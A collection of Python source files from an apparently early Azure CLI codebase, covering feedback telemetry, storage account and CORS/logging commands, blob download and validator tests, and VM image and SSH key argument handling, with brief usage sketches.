'prompt_do_well': '\nWhat do we do really well? ',
'prompt_email_addr': '\nIf you would like to join our insiders program and receive tips, '\
'tricks, and early access to new features, let us know by leaving your '\
'email address (leave blank to skip): ',
'thanks': '\nThanks for your feedback!'
}
INSTRUMENTATION_KEY = '02b91c82-6729-4241-befc-e6d02ca4fbba'
EVENT_NAME = 'FeedbackEvent'
COMPONENT_PREFIX = 'azure-cli-'
def _prompt_net_promoter_score():
while True:
try:
score = int(input(MESSAGES['prompt_how_likely']))
if 0 <= score <= 10:
return score
raise ValueError
except ValueError:
logger.warning('Valid values are %s', list(range(11)))
def _get_version_info():
from pip import get_installed_distributions
installed_dists = get_installed_distributions(local_only=True)
component_version_info = sorted([{'name': dist.key.replace(COMPONENT_PREFIX, ''),
'version': dist.version}
for dist in installed_dists
if dist.key.startswith(COMPONENT_PREFIX)],
key=lambda x: x['name'])
return str(component_version_info), sys.version
def _send_feedback(score, response_what_changes, response_do_well, email_address):
from applicationinsights import TelemetryClient
tc = TelemetryClient(INSTRUMENTATION_KEY)
tc.context.application.ver = core_version
version_components, version_python = _get_version_info()
tc.track_event(
EVENT_NAME,
{'response_what_changes': response_what_changes,
'response_do_well': response_do_well,
'response_email_address': email_address,
'version_components': version_components,
'version_python': version_python},
{'response_net_promoter_score':score})
tc.flush()
def handle_feedback():
try:
print(MESSAGES['intro'])
score = _prompt_net_promoter_score()
response_do_well = None
response_what_changes = None
if score == 10:
response_do_well = input(MESSAGES['prompt_do_well'])
else:
response_what_changes = input(MESSAGES['prompt_what_changes'])
email_address = input(MESSAGES['prompt_email_addr'])
_send_feedback(score, response_what_changes, response_do_well, email_address)
print(MESSAGES['thanks'])
except (EOFError, KeyboardInterrupt):
print()
```
#### File: command_modules/resource/_client_factory.py
```python
def _resource_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.resources import ResourceManagementClient
return get_mgmt_service_client(ResourceManagementClient)
def _resource_feature_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.features import FeatureClient
return get_mgmt_service_client(FeatureClient)
def _resource_policy_client_factory(**_):
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.mgmt.resource.policy import PolicyClient
return get_mgmt_service_client(PolicyClient)
def cf_resource_groups(_):
return _resource_client_factory().resource_groups
def cf_resources(_):
return _resource_client_factory().resources
def cf_providers(_):
return _resource_client_factory().providers
def cf_tags(_):
return _resource_client_factory().tags
def cf_deployments(_):
return _resource_client_factory().deployments
def cf_deployment_operations(_):
return _resource_client_factory().deployment_operations
def cf_features(_):
return _resource_feature_client_factory().features
def cf_policy_definitions(_):
return _resource_policy_client_factory().policy_definitions
```
#### File: command_modules/storage/custom.py
```python
from __future__ import print_function
from sys import stderr
from azure.mgmt.storage.models import Kind
from azure.storage.models import Logging, Metrics, CorsRule, RetentionPolicy
from azure.storage.blob import BlockBlobService
from azure.storage.blob.baseblobservice import BaseBlobService
from azure.storage.file import FileService
from azure.storage.table import TableService
from azure.storage.queue import QueueService
from azure.cli.core._util import CLIError
from azure.cli.command_modules.storage._factory import \
(storage_client_factory, generic_data_service_factory)
def _update_progress(current, total):
if total:
message = 'Percent complete: %'
percent_done = current * 100 / total
message += '{: >5.1f}'.format(percent_done)
print('\b' * len(message) + message, end='', file=stderr)
stderr.flush()
if current == total:
print('', file=stderr)
# CUSTOM METHODS
def list_storage_accounts(resource_group_name=None):
""" List storage accounts within a subscription or resource group. """
from azure.mgmt.storage.models import StorageAccount
from msrestazure.azure_active_directory import UserPassCredentials
scf = storage_client_factory()
if resource_group_name:
accounts = scf.storage_accounts.list_by_resource_group(resource_group_name)
else:
accounts = scf.storage_accounts.list()
return list(accounts)
def show_storage_account_usage():
""" Show the current count and limit of the storage accounts under the subscription. """
scf = storage_client_factory()
return next((x for x in scf.usage.list() if x.name.value == 'StorageAccounts'), None) #pylint: disable=no-member
# pylint: disable=line-too-long
def show_storage_account_connection_string(
resource_group_name, account_name, protocol='https', blob_endpoint=None,
file_endpoint=None, queue_endpoint=None, table_endpoint=None, key_name='primary'):
""" Generate connection string for a storage account."""
from azure.cli.core._profile import CLOUD
scf = storage_client_factory()
keys = scf.storage_accounts.list_keys(resource_group_name, account_name).keys #pylint: disable=no-member
endpoint_suffix = CLOUD.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
protocol,
endpoint_suffix,
account_name,
keys[0].value if key_name == 'primary' else keys[1].value) #pylint: disable=no-member
connection_string = '{}{}'.format(connection_string, ';BlobEndpoint={}'.format(blob_endpoint) if blob_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';FileEndpoint={}'.format(file_endpoint) if file_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';QueueEndpoint={}'.format(queue_endpoint) if queue_endpoint else '')
connection_string = '{}{}'.format(connection_string, ';TableEndpoint={}'.format(table_endpoint) if table_endpoint else '')
return {'connectionString': connection_string}
def create_storage_account(resource_group_name, account_name, sku, location,
kind=Kind.storage.value, tags=None, custom_domain=None,
encryption=None, access_tier=None):
''' Create a storage account. '''
from azure.mgmt.storage.models import \
(StorageAccountCreateParameters, Sku, CustomDomain, Encryption, AccessTier)
scf = storage_client_factory()
params = StorageAccountCreateParameters(
sku=Sku(sku),
kind=Kind(kind),
location=location,
tags=tags,
custom_domain=CustomDomain(custom_domain) if custom_domain else None,
encryption=encryption,
access_tier=AccessTier(access_tier) if access_tier else None)
return scf.storage_accounts.create(resource_group_name, account_name, params)
def set_storage_account_properties(
resource_group_name, account_name, sku=None, tags=None, custom_domain=None,
encryption=None, access_tier=None):
''' Update storage account property (only one at a time).'''
from azure.mgmt.storage.models import \
(StorageAccountUpdateParameters, Sku, CustomDomain, Encryption, AccessTier)
scf = storage_client_factory()
params = StorageAccountUpdateParameters(
sku=Sku(sku) if sku else None,
tags=tags,
custom_domain=CustomDomain(custom_domain) if custom_domain else None,
encryption=encryption,
access_tier=AccessTier(access_tier) if access_tier else None)
return scf.storage_accounts.update(resource_group_name, account_name, params)
def upload_blob( # pylint: disable=too-many-locals
client, container_name, blob_name, file_path, blob_type=None,
content_settings=None, metadata=None, validate_content=False, maxsize_condition=None,
max_connections=2, lease_id=None, if_modified_since=None,
if_unmodified_since=None, if_match=None, if_none_match=None, timeout=None):
'''Upload a blob to a container.'''
def upload_append_blob():
if not client.exists(container_name, blob_name):
client.create_blob(
container_name=container_name,
blob_name=blob_name,
content_settings=content_settings,
metadata=metadata,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout)
return client.append_blob_from_path(
container_name=container_name,
blob_name=blob_name,
file_path=file_path,
progress_callback=_update_progress,
validate_content=validate_content,
maxsize_condition=maxsize_condition,
lease_id=lease_id,
timeout=timeout)
def upload_block_blob():
return client.create_blob_from_path(
container_name=container_name,
blob_name=blob_name,
file_path=file_path,
progress_callback=_update_progress,
content_settings=content_settings,
metadata=metadata,
validate_content=validate_content,
max_connections=max_connections,
lease_id=lease_id,
if_modified_since=if_modified_since,
if_unmodified_since=if_unmodified_since,
if_match=if_match,
if_none_match=if_none_match,
timeout=timeout
)
type_func = {
'append': upload_append_blob,
'block': upload_block_blob,
'page': upload_block_blob # same implementation
}
return type_func[blob_type]()
upload_blob.__doc__ = BlockBlobService.create_blob_from_path.__doc__
def _get_service_container_type(client):
if isinstance(client, BlockBlobService):
return 'container'
elif isinstance(client, FileService):
return 'share'
elif isinstance(client, TableService):
return 'table'
elif isinstance(client, QueueService):
return 'queue'
else:
raise ValueError('Unsupported service {}'.format(type(client)))
def _get_acl(client, container_name, **kwargs):
container = _get_service_container_type(client)
get_acl = getattr(client, 'get_{}_acl'.format(container))
lease_id = kwargs.get('lease_id', None)
return get_acl(container_name, lease_id=lease_id) if lease_id else get_acl(container_name)
def _set_acl(client, container_name, acl, **kwargs):
container = _get_service_container_type(client)
set_acl = getattr(client, 'set_{}_acl'.format(container))
lease_id = kwargs.get('lease_id', None)
return set_acl(container_name, acl, lease_id=lease_id) if lease_id \
else set_acl(container_name, acl)
def create_acl_policy(
client, container_name, policy_name, start=None, expiry=None, permission=None, **kwargs):
''' Create a stored access policy on the containing object '''
from azure.storage.models import AccessPolicy
acl = _get_acl(client, container_name, **kwargs)
acl[policy_name] = AccessPolicy(permission, expiry, start)
return _set_acl(client, container_name, acl, **kwargs)
def get_acl_policy(client, container_name, policy_name, **kwargs):
''' Show a stored access policy on a containing object '''
from azure.storage.models import AccessPolicy
acl = _get_acl(client, container_name, **kwargs)
return acl.get(policy_name)
def list_acl_policies(client, container_name, **kwargs):
''' List stored access policies on a containing object '''
return _get_acl(client, container_name, **kwargs)
def set_acl_policy(client, container_name, policy_name, start=None, expiry=None, permission=None,
**kwargs):
''' Set a stored access policy on a containing object '''
from azure.storage.models import AccessPolicy
if not (start or expiry or permission):
raise CLIError('Must specify at least one property when updating an access policy.')
acl = _get_acl(client, container_name, **kwargs)
try:
policy = acl[policy_name]
policy.start = start or policy.start
policy.expiry = expiry or policy.expiry
policy.permission = permission or policy.permission
except KeyError:
raise CLIError('ACL does not contain {}'.format(policy_name))
return _set_acl(client, container_name, acl, **kwargs)
def delete_acl_policy(client, container_name, policy_name, **kwargs):
''' Delete a stored access policy on a containing object '''
acl = _get_acl(client, container_name, **kwargs)
del acl[policy_name]
return _set_acl(client, container_name, acl, **kwargs)
def insert_table_entity(client, table_name, entity, if_exists='fail', timeout=None):
if if_exists == 'fail':
client.insert_entity(table_name, entity, timeout)
elif if_exists == 'merge':
client.insert_or_merge_entity(table_name, entity, timeout)
elif if_exists == 'replace':
client.insert_or_replace_entity(table_name, entity, timeout)
else:
raise CLIError("Unrecognized value '{}' for --if-exists".format(if_exists))
class ServiceProperties(object):
def __init__(self, name, service):
self.name = name
self.service = service
self.client = None
def init_client(self, account_name=None, account_key=None, connection_string=None,
sas_token=None):
if not self.client:
self.client = generic_data_service_factory(
self.service, account_name, account_key, connection_string, sas_token)
def get_service_properties(self):
if not self.client:
raise CLIError('Must call init_client before attempting get_service_properties!')
return getattr(self.client, 'get_{}_service_properties'.format(self.name))
def set_service_properties(self):
if not self.client:
raise CLIError('Must call init_client before attempting set_service_properties!')
return getattr(self.client, 'set_{}_service_properties'.format(self.name))
def get_logging(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.get_service_properties()(timeout=timeout).__dict__['logging']
def set_logging(self, read, write, delete, retention, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
retention_policy = RetentionPolicy(
enabled=retention != 0,
days=retention
)
logging = Logging(delete, read, write, retention_policy)
return self.set_service_properties()(logging=logging, timeout=timeout)
def get_cors(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.get_service_properties()(timeout=timeout).__dict__['cors']
def add_cors(self, origins, methods, max_age, exposed_headers=None, allowed_headers=None,
account_name=None, account_key=None, connection_string=None, sas_token=None,
timeout=None):
cors = self.get_cors(account_name, account_key, connection_string, sas_token, timeout)
new_rule = CorsRule(origins, methods, max_age, exposed_headers, allowed_headers)
cors.append(new_rule)
return self.set_service_properties()(cors=cors, timeout=timeout)
def clear_cors(self, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
return self.set_service_properties()(cors=[], timeout=timeout)
def get_metrics(self, interval, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
props = self.get_service_properties()(timeout=timeout)
metrics = {}
if interval == 'both':
metrics['hour'] = props.__dict__['hour_metrics']
metrics['minute'] = props.__dict__['minute_metrics']
else:
metrics[interval] = props.__dict__['{}_metrics'.format(interval)]
return metrics
def set_metrics(self, retention, hour, minute, api=None, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
self.init_client(account_name, account_key, connection_string, sas_token)
retention_policy = RetentionPolicy(
enabled=retention != 0,
days=retention
)
hour_metrics = Metrics(hour, api, retention_policy) if hour is not None else None
minute_metrics = Metrics(minute, api, retention_policy) if minute is not None else None
return self.set_service_properties()(
hour_metrics=hour_metrics, minute_metrics=minute_metrics, timeout=timeout)
SERVICES = {
'b': ServiceProperties('blob', BaseBlobService),
'f': ServiceProperties('file', FileService),
'q': ServiceProperties('queue', QueueService),
't': ServiceProperties('table', TableService)
}
def list_cors(services='bfqt', account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_cors(
account_name, account_key, connection_string, sas_token, timeout)
return results
def add_cors(services, origins, methods, max_age=0, exposed_headers=None, allowed_headers=None,
account_name=None, account_key=None, connection_string=None, sas_token=None,
timeout=None):
for character in services:
properties = SERVICES[character]
properties.add_cors(
origins, methods, max_age, exposed_headers, allowed_headers, account_name, account_key,
connection_string, sas_token, timeout)
return None
def clear_cors(services, account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.clear_cors(
account_name, account_key, connection_string, sas_token, timeout)
return None
def set_logging(services, log, retention, account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.set_logging(
'r' in log, 'w' in log, 'd' in log, retention, account_name, account_key,
connection_string, sas_token, timeout)
return None
def set_metrics(services, retention, hour=None, minute=None, api=None, account_name=None,
account_key=None, connection_string=None, sas_token=None, timeout=None):
for character in services:
properties = SERVICES[character]
properties.set_metrics(
retention, hour, minute, api, account_name, account_key, connection_string,
sas_token, timeout)
return None
def get_logging(services='bqt', account_name=None, account_key=None, connection_string=None,
sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_logging(
account_name, account_key, connection_string, sas_token, timeout)
return results
def get_metrics(services='bfqt', interval='both', account_name=None, account_key=None,
connection_string=None, sas_token=None, timeout=None):
results = {}
for character in services:
properties = SERVICES[character]
results[properties.name] = properties.get_metrics(
interval, account_name, account_key, connection_string, sas_token, timeout)
return results
```
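The helpers above are thin wrappers around the legacy `azure.storage` data-plane SDK. The following is a minimal usage sketch, assuming the module is importable as `azure.cli.command_modules.storage.custom` (inferred from the file header) and that a real storage connection string is supplied; the placeholder string is illustrative only.
```python
# Hedged usage sketch -- not part of the original module. Assumes an installed
# azure-cli development environment and a valid storage connection string.
from azure.cli.command_modules.storage.custom import list_cors, set_logging

CONNECTION_STRING = "<storage-account-connection-string>"  # placeholder

# Turn on read/write/delete logging for the blob and queue services,
# retaining logs for 7 days (retention=0 would disable the retention policy).
set_logging(services="bq", log="rwd", retention=7,
            connection_string=CONNECTION_STRING)

# Collect the CORS rules currently configured for all four services.
print(list_cors(services="bfqt", connection_string=CONNECTION_STRING))
```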
#### File: storage/tests/integration_test_blob_download.py
```python
import os
import os.path
import shutil
from unittest import TestCase
from .integration_test_base import StorageIntegrationTestBase
from azure.cli.main import main as cli_main
class StorageBlobDownloadPlainTests(TestCase):
def test_blob_download_help(self):
with self.assertRaises(SystemExit):
cli_main('storage blob upload-batch -h'.split())
class StorageBlobDownloadIntegrationTests(StorageIntegrationTestBase):
@classmethod
def setUpClass(cls):
StorageIntegrationTestBase.setUpClass()
# set up sample container
cls._test_source_container = cls.generate_new_container_name()
assert cls._blob_service.create_container(cls._test_source_container)
cli_main('storage blob upload-batch -s {} -d {} --connection-string {}'
.format(cls._resource_folder, cls._test_source_container,
cls._test_connection_string)
.split())
test_blobs = [b.name for b in cls._blob_service.list_blobs(cls._test_source_container)]
assert len(test_blobs) == 41
@classmethod
def tearDownClass(cls):
cls._blob_service.delete_container(cls._test_source_container)
def setUp(self):
self._test_folder = os.path.join(os.getcwd(), 'test_temp')
if os.path.exists(self._test_folder):
shutil.rmtree(self._test_folder)
os.mkdir(self._test_folder)
def test_blob_download_recursively_without_pattern(self):
cmd = 'storage blob download-batch -s {} -d {} --account-name {} --account-key {}'\
.format(self._test_source_container, self._test_folder,
self._blob_service.account_name, self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41
def test_blob_download_recursively_with_pattern_1(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, '*', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 41
def test_blob_download_recursively_with_pattern_2(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, 'apple/*', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 10
def test_blob_download_recursively_with_pattern_3(self):
cmd = 'storage blob download-batch -s https://{}/{} -d {} --pattern {} --account-key {}'\
.format(self._blob_service.primary_endpoint, self._test_source_container,
self._test_folder, '*/file_0', self._blob_service.account_key)
cli_main(cmd.split())
assert sum(len(f) for r, d, f in os.walk(self._test_folder)) == 4
```
#### File: storage/tests/test_validators.py
```python
import unittest
from six import StringIO
from collections import namedtuple
from azure.cli.command_modules.storage._validators import *
class Test_storage_validators(unittest.TestCase):
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self.io = StringIO()
def tearDown(self):
self.io.close()
def test_permission_validator(self):
from azure.storage.blob.models import ContainerPermissions
from argparse import Namespace
ns1 = Namespace(permission='rwdl')
ns2 = Namespace(permission='abc')
get_permission_validator(ContainerPermissions)(ns1)
self.assertTrue(isinstance(ns1.permission, ContainerPermissions))
with self.assertRaises(ValueError):
get_permission_validator(ContainerPermissions)(ns2)
def test_datetime_string_type(self):
input = "2017-01-01T12:30Z"
actual = datetime_string_type(input)
expected = "2017-01-01T12:30Z"
self.assertEqual(actual, expected)
input = "2017-01-01 12:30"
with self.assertRaises(ValueError):
actual = datetime_string_type(input)
def test_datetime_type(self):
input = "2017-01-01T12:30Z"
actual = datetime_type(input)
expected = datetime(2017, 1, 1, 12, 30, 0)
self.assertEqual(actual, expected)
input = "2017-01-01 12:30"
with self.assertRaises(ValueError):
actual = datetime_type(input)
def test_ipv4_range_type(self):
input = "172.16.31.10"
actual = ipv4_range_type(input)
expected = input
self.assertEqual(actual, expected)
input = "172.16.31.10-22192.168.3.11"
actual = ipv4_range_type(input)
expected = input
self.assertEqual(actual, expected)
input = "111.22"
with self.assertRaises(ValueError):
actual = ipv4_range_type(input)
input = "111.22.33.44-"
with self.assertRaises(ValueError):
actual = ipv4_range_type(input)
def test_resource_types_type(self):
input = "sso"
actual = str(resource_type_type(input))
expected = "so"
self.assertEqual(actual, expected)
input = "blob"
with self.assertRaises(ValueError):
actual = resource_type_type(input)
def test_services_type(self):
input = "ttfqbqtf"
actual = str(services_type(input))
expected = "bqtf"
self.assertEqual(actual, expected)
input = "everything"
with self.assertRaises(ValueError):
actual = services_type(input)
if __name__ == '__main__':
unittest.main()
```
#### File: command_modules/vm/_actions.py
```python
import argparse
import json
import os
import re
from azure.cli.core._util import CLIError
from azure.cli.core.application import APPLICATION
from azure.cli.core.commands.parameters import get_one_of_subscription_locations
from azure.cli.core.commands.arm import resource_exists
import azure.cli.core._logging as _logging
from six.moves.urllib.request import urlopen #pylint: disable=import-error
from ._client_factory import _compute_client_factory
from ._vm_utils import read_content_if_is_file
logger = _logging.get_az_logger(__name__)
class VMImageFieldAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
image = values
match = re.match('([^:]*):([^:]*):([^:]*):([^:]*)', image)
if image.lower().endswith('.vhd'):
namespace.os_disk_type = 'custom'
namespace.custom_os_disk_uri = image
elif match:
namespace.os_type = 'Custom'
namespace.os_publisher = match.group(1)
namespace.os_offer = match.group(2)
namespace.os_sku = match.group(3)
namespace.os_version = match.group(4)
else:
images = load_images_from_aliases_doc()
matched = next((x for x in images if x['urnAlias'].lower() == image.lower()), None)
if matched is None:
raise CLIError('Invalid image "{}". Please pick one from {}' \
.format(image, [x['urnAlias'] for x in images]))
namespace.os_type = 'Custom'
namespace.os_publisher = matched['publisher']
namespace.os_offer = matched['offer']
namespace.os_sku = matched['sku']
namespace.os_version = matched['version']
class VMSSHFieldAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
namespace.ssh_key_value = read_content_if_is_file(values)
class VMDNSNameAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
dns_value = values
if dns_value:
namespace.dns_name_type = 'new'
namespace.dns_name_for_public_ip = dns_value
class PrivateIpAction(argparse.Action): #pylint: disable=too-few-public-methods
def __call__(self, parser, namespace, values, option_string=None):
private_ip = values
namespace.private_ip_address = private_ip
if private_ip:
namespace.private_ip_address_allocation = 'static'
def _resource_not_exists(resource_type):
def _handle_resource_not_exists(namespace):
# TODO: hook up namespace._subscription_id once we support it
ns, t = resource_type.split('/')
if resource_exists(namespace.resource_group_name, namespace.name, ns, t):
raise CLIError('Resource {} of type {} in group {} already exists.'.format(
namespace.name,
resource_type,
namespace.resource_group_name))
return _handle_resource_not_exists
def _handle_auth_types(**kwargs):
if kwargs['command'] != 'vm create' and kwargs['command'] != 'vmss create':
return
args = kwargs['args']
is_windows = 'Windows' in args.os_offer \
and getattr(args, 'custom_os_disk_type', None) != 'linux'
if not args.authentication_type:
args.authentication_type = 'password' if is_windows else 'ssh'
if args.authentication_type == 'password':
if args.ssh_dest_key_path:
raise CLIError('SSH parameters cannot be used with password authentication type')
elif not args.admin_password:
import getpass
            args.admin_password = getpass.getpass('Admin Password: ')
elif args.authentication_type == 'ssh':
if args.admin_password:
raise CLIError('Admin password cannot be used with SSH authentication type')
ssh_key_file = os.path.join(os.path.expanduser('~'), '.ssh/id_rsa.pub')
if not args.ssh_key_value:
if os.path.isfile(ssh_key_file):
with open(ssh_key_file) as f:
args.ssh_key_value = f.read()
else:
raise CLIError('An RSA key file or key value must be supplied to SSH Key Value')
if hasattr(args, 'network_security_group_type'):
args.network_security_group_rule = 'RDP' if is_windows else 'SSH'
if hasattr(args, 'nat_backend_port') and not args.nat_backend_port:
args.nat_backend_port = '3389' if is_windows else '22'
APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_auth_types)
def load_images_from_aliases_doc(publisher=None, offer=None, sku=None):
target_url = ('https://raw.githubusercontent.com/Azure/azure-rest-api-specs/'
'master/arm-compute/quickstart-templates/aliases.json')
txt = urlopen(target_url).read()
dic = json.loads(txt.decode())
try:
all_images = []
result = (dic['outputs']['aliases']['value'])
for v in result.values(): #loop around os
for alias, vv in v.items(): #loop around distros
all_images.append({
'urnAlias': alias,
'publisher': vv['publisher'],
'offer': vv['offer'],
'sku': vv['sku'],
'version': vv['version']
})
all_images = [i for i in all_images if (_partial_matched(publisher, i['publisher']) and
_partial_matched(offer, i['offer']) and
_partial_matched(sku, i['sku']))]
return all_images
except KeyError:
raise CLIError('Could not retrieve image list from {}'.format(target_url))
def load_images_thru_services(publisher, offer, sku, location):
from concurrent.futures import ThreadPoolExecutor, as_completed
all_images = []
client = _compute_client_factory()
if location is None:
location = get_one_of_subscription_locations()
def _load_images_from_publisher(publisher):
offers = client.virtual_machine_images.list_offers(location, publisher)
if offer:
offers = [o for o in offers if _partial_matched(offer, o.name)]
for o in offers:
skus = client.virtual_machine_images.list_skus(location, publisher, o.name)
if sku:
skus = [s for s in skus if _partial_matched(sku, s.name)]
for s in skus:
images = client.virtual_machine_images.list(location, publisher, o.name, s.name)
for i in images:
all_images.append({
'publisher': publisher,
'offer': o.name,
'sku': s.name,
'version': i.name})
publishers = client.virtual_machine_images.list_publishers(location)
if publisher:
publishers = [p for p in publishers if _partial_matched(publisher, p.name)]
publisher_num = len(publishers)
if publisher_num > 1:
with ThreadPoolExecutor(max_workers=40) as executor:
tasks = [executor.submit(_load_images_from_publisher, p.name) for p in publishers]
for t in as_completed(tasks):
t.result() # don't use the result but expose exceptions from the threads
elif publisher_num == 1:
_load_images_from_publisher(publishers[0].name)
return all_images
def load_extension_images_thru_services(publisher, name, version, location, show_latest=False):
from concurrent.futures import ThreadPoolExecutor, as_completed
##pylint: disable=no-name-in-module,import-error
from distutils.version import LooseVersion
all_images = []
client = _compute_client_factory()
if location is None:
location = get_one_of_subscription_locations()
def _load_extension_images_from_publisher(publisher):
types = client.virtual_machine_extension_images.list_types(location, publisher)
if name:
types = [t for t in types if _partial_matched(name, t.name)]
for t in types:
versions = client.virtual_machine_extension_images.list_versions(location,
publisher,
t.name)
if version:
versions = [v for v in versions if _partial_matched(version, v.name)]
if show_latest:
#pylint: disable=no-member
versions.sort(key=lambda v: LooseVersion(v.name), reverse=True)
all_images.append({
'publisher': publisher,
'name': t.name,
'version': versions[0].name})
else:
for v in versions:
all_images.append({
'publisher': publisher,
'name': t.name,
'version': v.name})
publishers = client.virtual_machine_images.list_publishers(location)
if publisher:
publishers = [p for p in publishers if _partial_matched(publisher, p.name)]
publisher_num = len(publishers)
if publisher_num > 1:
with ThreadPoolExecutor(max_workers=40) as executor:
tasks = [executor.submit(_load_extension_images_from_publisher,
p.name) for p in publishers]
for t in as_completed(tasks):
t.result() # don't use the result but expose exceptions from the threads
elif publisher_num == 1:
_load_extension_images_from_publisher(publishers[0].name)
return all_images
def get_vm_sizes(location):
return list(_compute_client_factory().virtual_machine_sizes.list(location))
def _partial_matched(pattern, string):
if not pattern:
return True # empty pattern means wildcard-match
pattern = r'.*' + pattern
return re.match(pattern, string, re.I)
def _create_image_instance(publisher, offer, sku, version):
return {
'publisher': publisher,
'offer': offer,
'sku': sku,
'version': version
}
def _handle_container_ssh_file(**kwargs):
if kwargs['command'] != 'acs create':
return
args = kwargs['args']
string_or_file = args.ssh_key_value
content = string_or_file
if os.path.exists(string_or_file):
logger.info('Use existing SSH public key file: %s', string_or_file)
with open(string_or_file, 'r') as f:
content = f.read()
elif not _is_valid_ssh_rsa_public_key(content) and args.generate_ssh_keys:
#figure out appropriate file names:
#'base_name'(with private keys), and 'base_name.pub'(with public keys)
public_key_filepath = string_or_file
if public_key_filepath[-4:].lower() == '.pub':
private_key_filepath = public_key_filepath[:-4]
else:
private_key_filepath = public_key_filepath + '.private'
content = _generate_ssh_keys(private_key_filepath, public_key_filepath)
logger.warning('Created SSH key files: %s,%s', private_key_filepath, public_key_filepath)
args.ssh_key_value = content
def _generate_ssh_keys(private_key_filepath, public_key_filepath):
import paramiko
ssh_dir, _ = os.path.split(private_key_filepath)
if not os.path.exists(ssh_dir):
os.makedirs(ssh_dir)
os.chmod(ssh_dir, 0o700)
key = paramiko.RSAKey.generate(2048)
key.write_private_key_file(private_key_filepath)
os.chmod(private_key_filepath, 0o600)
with open(public_key_filepath, 'w') as public_key_file:
public_key = '%s %s' % (key.get_name(), key.get_base64())
public_key_file.write(public_key)
os.chmod(public_key_filepath, 0o644)
return public_key
def _is_valid_ssh_rsa_public_key(openssh_pubkey):
#http://stackoverflow.com/questions/2494450/ssh-rsa-public-key-validation-using-a-regular-expression #pylint: disable=line-too-long
#A "good enough" check is to see if the key starts with the correct header.
import struct
try:
from base64 import decodebytes as base64_decode
except ImportError:
#deprecated and redirected to decodebytes in Python 3
from base64 import decodestring as base64_decode
parts = openssh_pubkey.split()
if len(parts) < 2:
return False
key_type = parts[0]
key_string = parts[1]
data = base64_decode(key_string.encode())#pylint:disable=deprecated-method
int_len = 4
str_len = struct.unpack('>I', data[:int_len])[0] # this should return 7
return data[int_len:int_len+str_len] == key_type.encode()
APPLICATION.register(APPLICATION.COMMAND_PARSER_PARSED, _handle_container_ssh_file)
```
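Most of the functions above need a live Azure subscription, but the two small helpers at the bottom are pure functions and can be exercised directly. A minimal sketch, assuming the module is importable as `azure.cli.command_modules.vm._actions` (the path is inferred from the file header) inside an azure-cli development environment:
```python
# Hedged sketch -- exercises only the pure helpers defined above; importing the
# module requires azure-cli-core because of its module-level APPLICATION hooks.
from azure.cli.command_modules.vm._actions import (
    _partial_matched, _is_valid_ssh_rsa_public_key)

assert _partial_matched("ubuntu", "UbuntuServer")      # case-insensitive substring match
assert _partial_matched(None, "anything")              # empty pattern acts as a wildcard
assert not _is_valid_ssh_rsa_public_key("not-a-key")   # fewer than two parts -> rejected
```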
#### File: lib/models/deployment_avail_set.py
```python
from msrest.serialization import Model
class DeploymentAvailSet(Model):
"""
Deployment operation parameters.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar uri: URI referencing the template. Default value:
"https://azuresdkci.blob.core.windows.net/templatehost/CreateAvailSet_2016-07-18/azuredeploy.json"
.
:vartype uri: str
:param content_version: If included it must match the ContentVersion in
the template.
:type content_version: str
:param location: Location to deploy the availability set.
:type location: str
:param name: Name of the availability set.
:type name: str
:param platform_fault_domain_count: Number of Fault Domains. Default
value: "3" .
:type platform_fault_domain_count: str
:param platform_update_domain_count: Number of Update Domains. Default
value: "5" .
:type platform_update_domain_count: str
:param tags: Tags object.
:type tags: object
:ivar mode: Gets or sets the deployment mode. Default value:
"Incremental" .
:vartype mode: str
"""
_validation = {
'uri': {'required': True, 'constant': True},
'name': {'required': True},
'mode': {'required': True, 'constant': True},
}
_attribute_map = {
'uri': {'key': 'properties.templateLink.uri', 'type': 'str'},
'content_version': {'key': 'properties.templateLink.contentVersion', 'type': 'str'},
'location': {'key': 'properties.parameters.location.value', 'type': 'str'},
'name': {'key': 'properties.parameters.name.value', 'type': 'str'},
